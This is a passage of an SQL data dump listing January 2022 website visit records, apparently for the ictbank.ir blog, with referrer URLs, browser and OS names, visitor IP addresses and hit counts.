(18086,'2022-01-13','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.14.209.170','000',0,2,0),
(18087,'2022-01-14','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,16,0),
(18088,'2022-01-14','http://ictbank.ir/blog','Firefox','Ubuntu','Unknown',NULL,NULL,'','73.71.195.95','000',0,1,0),
(18089,'2022-01-14','https://www.google.com/','Chrome','Windows','10.0',NULL,NULL,'','210.19.203.51','000',0,1,0),
(18090,'2022-01-14','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','45.146.165.37','000',0,6,0),
(18091,'2022-01-14','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','65.21.206.46','000',0,1,0),
(18092,'2022-01-14','http://ictbank.ir/blog','Safari','Windows','6.1',NULL,NULL,'','44.192.122.226','000',0,2,0),
(18093,'2022-01-14','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','89.32.104.117','000',0,1,0),
(18094,'2022-01-14','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','181.214.206.161','000',0,2,0),
(18095,'2022-01-14','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','193.118.53.210','000',0,3,0),
(18096,'2022-01-14','http://ictbank.ir','Chrome','Windows','10.0',NULL,NULL,'','212.102.60.169','000',0,1,0),
(18097,'2022-01-14','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','23.250.19.242','000',0,2,0),
(18098,'2022-01-14','ictbank.ir','Chrome','Windows','6.1',NULL,NULL,'','173.249.33.122','000',0,1,0),
(18099,'2022-01-14','http://ictbank.ir/blog','Chrome','OS X','10.15.7',NULL,NULL,'','5.236.188.236','000',0,3,0),
(18100,'2022-01-14','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.14.141.34','000',0,2,0),
(18101,'2022-01-14','https://www.google.com/','Chrome','OS X','10.15.7',NULL,NULL,'','69.253.3.186','000',0,1,0),
(18102,'2022-01-14','https://www.google.com/','Chrome','Windows','10.0',NULL,NULL,'','67.230.43.113','000',0,1,0),
(18103,'2022-01-14','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','199.247.12.177','000',0,1,0),
(18104,'2022-01-14','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','199.247.15.206','000',0,1,0),
(18105,'2022-01-14','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','209.250.227.234','000',0,2,0),
(18106,'2022-01-14','http://82.102.9.14/blog','Chrome','Windows','5.1',NULL,NULL,'','180.149.125.170','000',0,1,0),
(18107,'2022-01-15','http://ictbank.ir/blog','Chrome','OS X','10.13.6',NULL,NULL,'','185.27.99.127','000',0,1,0),
(18108,'2022-01-15','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','45.146.165.37','000',0,6,0),
(18109,'2022-01-15','http://ictbank.ir','Chrome','Windows','10.0',NULL,NULL,'','37.120.144.83','000',0,5,0),
(18110,'2022-01-15','http://82.102.9.14/blog','Chrome','Linux','Unknown',NULL,NULL,'','125.64.94.212','000',0,2,0),
(18111,'2022-01-15','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','162.219.31.110','000',0,2,0),
(18112,'2022-01-15','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.1.248.42','000',0,2,0),
(18113,'2022-01-15','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','193.118.53.202','000',0,2,0),
(18114,'2022-01-15','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','41.60.120.135','000',0,1,0),
(18115,'2022-01-15','http://ictbank.ir/blog','Firefox','Windows','Unknown',NULL,NULL,'','217.146.82.22','000',0,2,0),
(18116,'2022-01-15','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','185.14.184.98','000',0,2,0),
(18117,'2022-01-15','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','199.247.15.206','000',0,1,0),
(18118,'2022-01-15','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','192.248.169.62','000',0,1,0),
(18119,'2022-01-15','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','185.40.4.163','000',0,2,0),
(18120,'2022-01-15','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','62.173.148.44','000',0,2,0),
(18121,'2022-01-15','http://ictbank.ir/blog','Firefox','Ubuntu','Unknown',NULL,NULL,'','51.91.7.5','000',0,1,0),
(18122,'2022-01-16','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','45.154.255.147','000',0,1,0),
(18123,'2022-01-16','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','5.164.196.34','000',0,1,0),
(18124,'2022-01-16','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','193.118.53.202','000',0,2,0),
(18125,'2022-01-16','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','51.68.11.191','000',0,1,0),
(18126,'2022-01-16','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','80.82.77.192','000',0,2,0),
(18127,'2022-01-16','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,2,0),
(18128,'2022-01-16','http://ictbank.ir/blog','Chrome','OS X','10.9.3',NULL,NULL,'','45.129.18.62','000',0,1,0),
(18129,'2022-01-16','http://ictbank.ir/blog','Chrome','OS X','10.9.3',NULL,NULL,'','45.129.18.196','000',0,1,0),
(18130,'2022-01-16','http://ictbank.ir/blog','Chrome','OS X','10.9.3',NULL,NULL,'','45.129.18.206','000',0,1,0),
(18131,'2022-01-16','http://ictbank.ir/blog','Chrome','OS X','10.9.3',NULL,NULL,'','45.129.18.91','000',0,1,0),
(18132,'2022-01-16','http://ictbank.ir/blog','Chrome','OS X','10.9.3',NULL,NULL,'','45.129.18.194','000',0,1,0),
(18133,'2022-01-16','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','45.146.165.37','000',0,6,0),
(18134,'2022-01-16','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.14.209.162','000',0,2,0),
(18135,'2022-01-16','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','138.68.169.239','000',0,2,0),
(18136,'2022-01-16','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','209.250.227.234','000',0,1,0),
(18137,'2022-01-16','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','192.248.169.62','000',0,1,0),
(18138,'2022-01-16','http://ictbank.ir','Opera','OS X','10.6.8',NULL,NULL,'','198.50.168.185','000',0,2,0),
(18139,'2022-01-16','http://ictbank.ir:80','Kazehakase','Linux','Unknown',NULL,NULL,'','172.83.156.205','000',0,2,0),
(18140,'2022-01-17','http://82.102.9.14/blog','Chrome','Linux','Unknown',NULL,NULL,'','160.116.22.22','000',0,4,0),
(18141,'2022-01-17','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','134.122.98.218','000',0,9,0),
(18142,'2022-01-17','http://ictbank.ir/blog','Chrome','OS X','10.15.7',NULL,NULL,'','13.59.32.185','000',0,4,0),
(18143,'2022-01-17','https://www.google.com/','Chrome','Windows','10.0',NULL,NULL,'','103.203.137.3','000',0,1,0),
(18144,'2022-01-17','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','162.221.192.26','000',0,2,0),
(18145,'2022-01-17','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','45.146.165.37','000',0,8,0),
(18146,'2022-01-17','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','5.164.192.57','000',0,1,0),
(18147,'2022-01-17','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.14.209.170','000',0,2,0),
(18148,'2022-01-17','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','5.161.66.114','000',0,2,0),
(18149,'2022-01-17','http://www.ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','137.74.24.99','000',0,2,0),
(18150,'2022-01-17','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','162.241.226.193','000',0,1,0),
(18151,'2022-01-17','https://www.google.fr/','Safari','iOS','15.2',NULL,NULL,'','41.223.97.192','000',0,1,0),
(18152,'2022-01-17','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','192.248.163.106','000',0,1,0),
(18153,'2022-01-17','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','198.199.124.144','000',0,1,0),
(18154,'2022-01-17','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','138.68.169.239','000',0,1,0),
(18155,'2022-01-17','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','185.14.184.98','000',0,1,0),
(18156,'2022-01-17','http://ictbank.ir','Chrome','Windows','10.0',NULL,NULL,'','147.78.141.85','000',0,5,0),
(18157,'2022-01-17','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,2,0),
(18158,'2022-01-17','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','51.254.59.113','000',0,1,0),
(18159,'2022-01-18','http://82.102.9.14/blog','Chrome','Windows','5.1',NULL,NULL,'','180.149.125.167','000',0,1,0),
(18160,'2022-01-18','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,16,0),
(18161,'2022-01-18','http://ictbank.ir/','Firefox','Ubuntu','Unknown',NULL,NULL,'','80.234.34.116','000',0,1,0),
(18162,'2022-01-18','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.14.209.162','000',0,2,0),
(18163,'2022-01-18','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','45.146.165.37','000',0,8,0),
(18164,'2022-01-18','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.1.248.42','000',0,2,0),
(18165,'2022-01-18','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','172.70.188.39','000',0,1,0),
(18166,'2022-01-18','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','49.204.185.19','000',0,1,0),
(18167,'2022-01-18','http://ictbank.ir/','Chrome','Windows','6.3',NULL,NULL,'','104.144.241.26','000',0,1,0),
(18168,'2022-01-18','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','5.164.216.11','000',0,1,0),
(18169,'2022-01-18','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','209.250.227.234','000',0,1,0),
(18170,'2022-01-18','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','192.248.169.62','000',0,2,0),
(18171,'2022-01-18','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','142.93.44.71','000',0,1,0),
(18172,'2022-01-18','http://ictbank.ir/blog/php-mysqli_connect-the-server-requested-authentication-method-unknown-to-the-client-caching_sha2_password/','Chrome','Windows','6.1',NULL,NULL,'','176.106.247.22','000',0,2,0),
(18173,'2022-01-18','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','185.38.175.131','000',0,1,0),
(18174,'2022-01-19','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,16,0),
(18175,'2022-01-19','http://ictbank.ir/blog','Chrome','Windows','6.2',NULL,NULL,'','3.89.183.233','000',0,2,0),
(18176,'2022-01-19','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','45.146.165.37','000',0,9,0),
(18177,'2022-01-19','http://ictbank.ir/blog','Chrome','OS X','10.9.3',NULL,NULL,'','45.129.18.75','000',0,1,0),
(18178,'2022-01-19','http://ictbank.ir/blog','Chrome','OS X','10.9.3',NULL,NULL,'','45.129.18.161','000',0,1,0),
(18179,'2022-01-19','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','172.93.174.160','000',0,2,0),
(18180,'2022-01-19','http://ictbank.ir/blog','Chrome','OS X','10.9.3',NULL,NULL,'','45.129.18.189','000',0,1,0),
(18181,'2022-01-19','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','198.57.247.232','000',0,1,0),
(18182,'2022-01-19','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','193.118.53.202','000',0,2,0),
(18183,'2022-01-19','https://www.google.com/','Chrome','Windows','10.0',NULL,NULL,'','212.174.149.34','000',0,1,0),
(18184,'2022-01-19','http://ictbank.ir/blog','Firefox','Windows','6.1',NULL,NULL,'','139.162.224.31','000',0,2,0),
(18185,'2022-01-19','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.1.248.42','000',0,2,0),
(18186,'2022-01-19','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','45.77.228.152','000',0,1,0),
(18187,'2022-01-19','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','192.248.169.62','000',0,2,0),
(18188,'2022-01-19','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','185.14.184.98','000',0,1,0),
(18189,'2022-01-19','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','209.97.180.10','000',0,1,0),
(18190,'2022-01-19','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','45.79.204.46','000',0,2,0),
(18191,'2022-01-20','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','121.121.90.84','000',0,2,0),
(18192,'2022-01-20','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,16,0),
(18193,'2022-01-20','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.14.133.58','000',0,2,0),
(18194,'2022-01-20','http://ictbank.ir/blog','Chrome','OS X','10.11.6',NULL,NULL,'','60.191.125.35','000',0,1,0),
(18195,'2022-01-20','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','162.221.192.26','000',0,2,0),
(18196,'2022-01-20','http://ictbank.ir','Chrome','Windows','6.1',NULL,NULL,'','142.93.48.245','000',0,1,0),
(18197,'2022-01-20','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','89.248.172.16','000',0,2,0),
(18198,'2022-01-20','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','185.191.34.215','000',0,1,0),
(18199,'2022-01-20','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','194.44.247.218','000',0,1,0),
(18200,'2022-01-20','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','45.146.165.37','000',0,8,0),
(18201,'2022-01-20','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','185.14.186.217','000',0,1,0),
(18202,'2022-01-20','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','192.81.221.200','000',0,1,0),
(18203,'2022-01-20','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','185.14.184.98','000',0,1,0),
(18204,'2022-01-20','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','138.68.169.239','000',0,1,0),
(18205,'2022-01-20','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','23.251.102.74','000',0,2,0),
(18206,'2022-01-20','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','199.79.62.15','000',0,1,0),
(18207,'2022-01-21','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','193.118.53.202','000',0,2,0),
(18208,'2022-01-21','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,2,0),
(18209,'2022-01-21','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','23.251.102.82','000',0,2,0),
(18210,'2022-01-21','http://ictbank.ir/blog','Chrome','OS X','10.9.3',NULL,NULL,'','45.129.18.156','000',0,1,0),
(18211,'2022-01-21','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.1.248.42','000',0,2,0),
(18212,'2022-01-21','http://ictbank.ir/blog','Chrome','OS X','10.13.6',NULL,NULL,'','93.158.90.69','000',0,1,0),
(18213,'2022-01-21','https://www.google.com/','Chrome','Windows','10.0',NULL,NULL,'','49.36.28.8','000',0,1,0),
(18214,'2022-01-21','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','45.146.165.37','000',0,7,0),
(18215,'2022-01-21','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.14.134.134','000',0,2,0),
(18216,'2022-01-21','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','198.199.124.144','000',0,1,0),
(18217,'2022-01-21','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','192.248.169.62','000',0,2,0),
(18218,'2022-01-21','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','165.22.120.64','000',0,1,0),
(18219,'2022-01-21','http://82.102.9.14:80/blog','360 Safe Explorer','Windows','6.1',NULL,NULL,'','183.136.226.3','000',0,2,0),
(18220,'2022-01-21','http://ictbank.ir','Chrome','Windows','10.0',NULL,NULL,'','147.78.141.191','000',0,5,0),
(18221,'2022-01-21','http://ictbank.ir/blog','Unknown','Linux','Unknown',NULL,NULL,'','176.9.111.189','000',0,1,0),
(18222,'2022-01-22','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.1.248.26','000',0,2,0),
(18223,'2022-01-22','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','23.251.102.74','000',0,4,0),
(18224,'2022-01-22','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','65.21.206.43','000',0,1,0),
(18225,'2022-01-22','https://www.google.com/','Chrome','Windows','6.3',NULL,NULL,'','49.36.17.37','000',0,1,0),
(18226,'2022-01-22','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','45.146.165.37','000',0,6,0),
(18227,'2022-01-22','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','185.220.101.48','000',0,1,0),
(18228,'2022-01-22','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','185.61.152.50','000',0,1,0),
(18229,'2022-01-22','http://ictbank.ir/blog','Vivaldi','Windows','10.0',NULL,NULL,'','156.146.36.111','000',0,2,0),
(18230,'2022-01-22','http://ictbank.ir/blog/','Vivaldi','Windows','10.0',NULL,NULL,'','156.146.36.105','000',0,8,0),
(18231,'2022-01-22','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,2,0),
(18232,'2022-01-22','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','164.90.206.15','000',0,1,0),
(18233,'2022-01-22','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','199.247.12.177','000',0,1,0),
(18234,'2022-01-22','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','165.22.120.64','000',0,1,0),
(18235,'2022-01-22','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','142.93.44.71','000',0,1,0),
(18236,'2022-01-22','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.14.134.134','000',0,2,0),
(18237,'2022-01-22','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','164.70.116.82','000',0,2,0),
(18238,'2022-01-23','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,2,0),
(18239,'2022-01-23','http://ictbank.ir/blog','Chrome','OS X','10.9.4',NULL,NULL,'','43.135.167.149','000',0,2,0),
(18240,'2022-01-23','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','193.162.143.116','000',0,6,0),
(18241,'2022-01-23','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','193.118.53.210','000',0,2,0),
(18242,'2022-01-23','https://www.google.com/','Chrome','Windows','10.0',NULL,NULL,'','196.235.53.215','000',0,1,0),
(18243,'2022-01-23','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','45.146.165.37','000',0,2,0),
(18244,'2022-01-23','http://ictbank.ir','Chrome','Windows','10.0',NULL,NULL,'','147.78.141.192','000',0,5,0),
(18245,'2022-01-23','http://ictbank.ir/blog','Firefox','Windows','5.1',NULL,NULL,'','193.92.182.236','000',0,2,0),
(18246,'2022-01-23','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','188.40.113.31','000',0,1,0),
(18247,'2022-01-23','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','199.247.15.206','000',0,1,0),
(18248,'2022-01-23','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','164.90.206.15','000',0,1,0),
(18249,'2022-01-23','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','165.22.120.64','000',0,1,0),
(18250,'2022-01-23','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','209.250.227.234','000',0,1,0),
(18251,'2022-01-23','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','37.57.137.208','000',0,8,0),
(18252,'2022-01-23','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','188.93.67.194','000',0,6,0),
(18253,'2022-01-24','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','172.93.144.152','000',0,22,0),
(18254,'2022-01-24','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','107.191.102.97','000',0,2,0),
(18255,'2022-01-24','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.14.141.34','000',0,2,0),
(18256,'2022-01-24','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,2,0),
(18257,'2022-01-24','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','193.162.143.116','000',0,2,0),
(18258,'2022-01-24','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','45.146.165.37','000',0,9,0),
(18259,'2022-01-24','https://www.google.com/','Chrome','Windows','10.0',NULL,NULL,'','130.61.254.196','000',0,1,0),
(18260,'2022-01-24','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.1.248.42','000',0,2,0),
(18261,'2022-01-24','http://ictbank.ir/blog','Chrome','OS X','10.9.3',NULL,NULL,'','45.129.18.95','000',0,1,0),
(18262,'2022-01-24','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','38.121.77.107','000',0,1,0),
(18263,'2022-01-24','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','77.244.144.33','000',0,2,0),
(18264,'2022-01-24','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','196.45.154.42','000',0,1,0),
(18265,'2022-01-24','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','162.221.192.26','000',0,2,0),
(18266,'2022-01-24','https://www.google.com/','Chrome','Windows','10.0',NULL,NULL,'','49.36.179.55','000',0,1,0),
(18267,'2022-01-24','http://ictbank.ir/blog','Firefox','Linux','Unknown',NULL,NULL,'','15.206.235.52','000',0,1,0),
(18268,'2022-01-24','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','23.251.102.74','000',0,2,0),
(18269,'2022-01-24','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','64.227.107.188','000',0,2,0),
(18270,'2022-01-24','http://ictbank.ir','Unknown','Unknown','Unknown',NULL,NULL,'','86.110.247.132','000',0,1,0),
(18271,'2022-01-24','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','45.76.44.57','000',0,1,0),
(18272,'2022-01-24','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','185.14.184.98','000',0,1,0),
(18273,'2022-01-24','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','45.77.228.152','000',0,1,0),
(18274,'2022-01-24','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','165.22.120.64','000',0,1,0),
(18275,'2022-01-24','http://ictbank.ir','Unknown','Unknown','Unknown',NULL,NULL,'','52.147.207.96','000',0,1,0),
(18276,'2022-01-25','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','45.146.165.37','000',0,7,0),
(18277,'2022-01-25','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','155.137.169.223','000',0,4,0),
(18278,'2022-01-25','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','204.12.242.178','000',0,9,0),
(18279,'2022-01-25','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','65.154.226.165','000',0,2,0),
(18280,'2022-01-25','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','62.210.88.24','000',0,1,0),
(18281,'2022-01-25','http://ictbank.ir/blog','Chrome','OS X','10.15.7',NULL,NULL,'','85.250.155.130','000',0,1,0),
(18282,'2022-01-25','https://www.google.com/','Chrome','Windows','10.0',NULL,NULL,'','82.114.91.45','000',0,1,0),
(18283,'2022-01-25','http://ictbank.ir/blog','Chrome','OS X','10.10.1',NULL,NULL,'','181.214.206.161','000',0,2,0),
(18284,'2022-01-25','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,2,0),
(18285,'2022-01-25','https://www.google.com/','Chrome','Windows','10.0',NULL,NULL,'','81.0.32.41','000',0,1,0),
(18286,'2022-01-25','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','142.93.44.71','000',0,1,0),
(18287,'2022-01-25','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','217.69.6.41','000',0,1,0),
(18288,'2022-01-25','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','185.14.184.98','000',0,1,0),
(18289,'2022-01-25','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','192.248.163.106','000',0,1,0),
(18290,'2022-01-25','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','149.210.196.225','000',0,1,0),
(18291,'2022-01-25','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','45.129.56.200','000',0,1,0),
(18292,'2022-01-25','https://www.google.com/','Chrome','Windows','10.0',NULL,NULL,'','70.67.124.17','000',0,1,0),
(18293,'2022-01-26','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','45.146.165.37','000',0,8,0),
(18294,'2022-01-26','http://ictbank.ir','Unknown','Unknown','Unknown',NULL,NULL,'','201.149.55.226','000',0,1,0),
(18295,'2022-01-26','http://ictbank.ir/blog','Firefox','Windows','6.1',NULL,NULL,'','139.162.220.57','000',0,2,0),
(18296,'2022-01-26','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','204.12.242.178','000',0,9,0),
(18297,'2022-01-26','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.1.248.34','000',0,2,0),
(18298,'2022-01-26','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','54.244.214.196','000',0,1,0),
(18299,'2022-01-26','http://www.design-arena.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','51.89.228.207','000',0,2,0),
(18300,'2022-01-26','http://ictbank.ir/blog/','Chrome','Windows','6.3',NULL,NULL,'','188.93.67.194','000',0,6,0),
(18301,'2022-01-26','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','20.124.186.35','000',0,3,0),
(18302,'2022-01-26','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','107.191.47.0','000',0,1,0),
(18303,'2022-01-26','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','165.22.120.64','000',0,1,0),
(18304,'2022-01-26','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','138.68.169.239','000',0,1,0),
(18305,'2022-01-26','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','209.250.227.234','000',0,1,0),
(18306,'2022-01-26','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','5.161.66.108','000',0,1,0),
(18307,'2022-01-26','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','77.111.247.232','000',0,1,0),
(18308,'2022-01-26','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','107.172.141.130','000',0,2,0),
(18309,'2022-01-26','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','62.173.148.44','000',0,2,0),
(18310,'2022-01-26','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,2,0),
(18311,'2022-01-27','http://ictbank.ir/blog','Chrome','iOS','12.1',NULL,NULL,'','192.99.18.136','000',0,4,0),
(18312,'2022-01-27','http://ictbank.ir/blog','Internet Explorer','Windows','5.1',NULL,NULL,'','5.188.211.26','000',0,12,0),
(18313,'2022-01-27','http://ictbank.ir/blog','Chrome','Windows','6.3',NULL,NULL,'','176.106.247.22','000',0,1,0),
